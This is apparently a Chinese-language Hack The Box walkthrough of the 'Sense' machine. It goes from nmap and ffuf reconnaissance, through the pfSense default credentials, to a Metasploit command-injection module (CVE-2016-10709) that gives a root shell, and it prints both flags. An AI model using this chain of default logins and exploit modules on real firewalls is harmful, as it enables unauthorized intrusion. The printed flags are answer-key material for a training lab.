目录
连接至HTB服务器并启动靶机
1.What is the name of the webserver running on port 80 and 443 according to nmap?
使用nmap对靶机TCP端口进行开放扫描
2.What is the name of the application that presents a login screen on port 443?
使用浏览器访问靶机80端口
3.What txt file can be found on the webserver that contains user information?
使用ffuf对靶机进行路径FUZZ
使用curl访问system-users.txt文件
4.What is the username found in the system-users.txt file?
5.What is the default password for a pfsense installation?
使用浏览器搜索pfsense默认凭证
6.What version of pfSense is running on Sense?
使用上文凭证对网页进行登陆后进入到仪表盘
7.What 2016 CVE ID describes a command injection vulnerability in a PHP page on pfSense via a GET parameter?
使用searchsploit搜索pfsense当前版本相关漏洞EXP、PoC
尝试利用该非预期EXP
启动Metasploit
8.Submit the flag located in the rohit user's home directory.
9.Submit the flag located in root's home directory.
USER_FLA:8721327cc232073b40d27d9c17e7348b
ROOT_FLAG:d08c32a5d4f8c8b10e76eb51a69f1a86
连接至HTB服务器并启动靶机
靶机IP:10.10.10.60
分配IP:10.10.14.12
1.What is the name of the webserver running on port 80 and 443 according to nmap
?
使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.60
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 21:32 EST
Nmap scan report for 10.10.10.60 (10.10.10.60)
Host is up (0.062s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open httpsNmap done: 1 IP address (1 host up) scanned in 74.62 seconds
对靶机开放TCP端口进行脚本服务信息扫描
nmap -p 80,443 -sCV 10.10.10.60
由nmap扫描结果可知,80端口与443端口托管服务:lighttpd
2.What is the name of the application that presents a login screen on port 443?
使用浏览器访问靶机80端口
显示在屏幕上的应用程序为:pfsense
3.What txt file can be found on the webserver that contains user information?
使用ffuf对靶机进行路径FUZZ
ffuf -u https://10.10.10.60/FUZZ -w ../dictionary/common.txt -t 200 -fs 6690
这里扫出来的东西太少了,因为字典不给力的原因这次换个大的扫描敏感文件
ffuf -u https://10.10.10.60/FUZZ -w Half-Dir.txt -e .txt -t 100
使用curl访问system-users.txt文件
curl -k https://10.10.10.60/system-users.txt
4.What is the username found in the system-users.txt file?
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -k https://10.10.10.60/system-users.txt
####Support ticket###Please create the following user
username: Rohit
password: company defaults
获取到账户名:Rohit
账户:rohit
5.What is the default password for a pfsense installation?
使用浏览器搜索pfsense默认凭证
由搜索可知pfsense默认密码为:pfsense
账户:rohit
密码:pfsense
6.What version of pfSense is running on Sense?
使用上文凭证对网页进行登陆后进入到仪表盘
由展示内容可知,pfsense版本为:2.1.3-RELEASE
7.What 2016 CVE ID describes a command injection vulnerability in a PHP page on pfSense via a GET parameter?
使用searchsploit搜索pfsense当前版本相关漏洞EXP、PoC
searchsploit pfsense 2.1.3
将该EXP拷贝到当前目录下
searchsploit -m 43560.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 43560.py
Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
URL: https://www.exploit-db.com/exploits/43560
Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
Codes: CVE-2014-4688
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/43560.py
由模块描述可知,该EXP基于漏洞:CVE-2014-4688。往上交发现答案不对
尝试利用该非预期EXP
利用失败,转向MSF走预期EXP
启动Metasploit
msfconsole
搜索pfsense相关利用模块
search pfsense
切换到EXP模块
use exploit/unix/http/pfsense_graph_injection_exec
展示该模块信息
info
由展示信息可知,该模块基于漏洞:CVE-2016-10709
8.Submit the flag located in the rohit user's home directory.
9.Submit the flag located in root's home directory.
列出该模块可填选项
show options
我们需要填好的选项有:LHOST、LPORT、RHOSTS、USERNAME
(少见的不需要提权直接拿到ROOT的靶机)
想搜索一下user_flag和root_flag发现根本找不到
meterpreter > search -f user.txt
No files matching your search were found.
meterpreter > search -f root.txt
No files matching your search were found.
meterpreter > search -f flag.txt
No files matching your search were found.
切换到终端
shell
查找user_flag、root_flag位置并查看其内容
find / -name 'user.txt' 2>/dev/null
/home/rohit/user.txt
cat /home/rohit/user.txt
8721327cc232073b40d27d9c17e7348b
find / -name 'root.txt'
/root/root.txt
cat /root/root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86